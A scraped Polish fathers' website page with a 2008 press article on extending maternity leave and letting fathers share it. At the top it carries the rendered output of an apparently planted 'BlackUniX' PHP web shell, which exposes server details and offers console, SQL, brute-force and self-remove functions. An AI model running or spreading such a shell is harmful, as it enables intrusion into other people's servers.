W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-18 13:04:54
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.196.42.146
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Dłuższy urlop macierzyński równiez dla taty
18.09.2008.
Od nowego roku urlop macierzyński będzie trwać 20 tygodni, a w kolejnych latach coraz dłużej. Od 2010 r. podzielony będzie na dwie części: obowiązkową i fakultatywną. przypomnijmy, że polskie prawo przewiduje możliwość dzielenia urlopu macierzyńskiego przez rodziców między siebie. Przy pierwszym dziecku tata może pójść na 4 tygodnie macierzyńskiego, przy drugim na 6 tygodni, przy trzecim i każdym kolejnym na 14.
O ile wydłuży się urlop macierzyński. By złagodzić skutki dłuższych urlopów macierzyńskich, będą one wydłużone stopniowo. Politycy mają nadzieję, że pewna liczba rodziców wykorzysta tylko część obowiązkowego urlopu.
Wczoraj w Sejmie odbyło się pierwsze czytanie rządowego projektu tzw. ustawy prorodzinnej. Przewiduje ona zmiany w przepisach kodeksu pracy i innych ustawach. Proponowane rozwiązania mają ułatwić pogodzenie pracy zawodowej z macierzyństwem.

Nawet 39 tygodni

Poważne zmiany dotyczą urlopów macierzyńskich. Od nowego roku będą stopniowo wydłużane, docelowo potrwają 26 tygodni po urodzeniu jednego dziecka i 39 tygodni, gdy urodzą się co najmniej bliźniaki (patrz infografika).

Nowością jest propozycja podziału urlopu na część obowiązkową – 20 tygodni – i część fakultatywną, którą pracownik będzie mógł wziąć, gdy np. uzna, że jego dziecko jest jeszcze zbyt małe, by zostawić je z opiekunką. Wystarczy, że złoży wniosek do pracodawcy na siedem dni przed rozpoczęciem dodatkowego urlopu. Zakład pracy nie będzie mógł odmówić udzielenia dodatkowego urlopu.

Takie rozwiązanie jednak budzi wątpliwości związkowców.

– Dużo korzystniejsze byłoby bezwarunkowe i obowiązkowe wydłużenie urlopu, bo pracodawca żadnymi naciskami nie będzie mógł wymusić rezygnacji z tego uprawnienia. Mam nadzieję, że takie rozwiązanie uda się przeforsować w dalszych pracach Sejmu – mówi Janusz Łaznowski, przewodniczący dolnośląskiego NSZZ „Solidarność”.

Wniosek niepotrzebny

Panie przebywające 1 stycznia 2009 r. na urlopie macierzyńskim automatycznie skorzystają z jego wydłużenia. Nie będą musiały występować do pracodawcy z wnioskami. Obecne przepisy pozwalają rodzicom uprawnionym do urlopu wychowawczego na powrót do pracy na część etatu. Jednak osoby decydujące się na takie rozwiązanie nie są objęte ochroną przed rozwiązaniem umowy o pracę, jaka przysługuje korzystającym z klasycznego urlopu wychowawczego. Po zmianach pracodawca nie będzie mógł wypowiedzieć ani rozwiązać umowy o pracę w okresie od dnia złożenia wniosku o obniżenie wymiaru czasu pracy aż do dnia powrotu do nieobniżonego wymiaru czasu pracy.

Ten pomysł z kolei nie podoba się pracodawcom.

– Wystarczy, że pracownik złoży wniosek o obniżenie wymiaru czasu pracy np. o 1/40 i już zostanie objęty ochroną przed zwolnieniem. Finansowo niewiele straci, ale zagwarantuje sobie etat nawet na trzy lata – mówi Henryk Michałowicz, ekspert Konfederacji Pracodawców Polskich.
źródło: Rzeczpospolita
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


18.06.2018.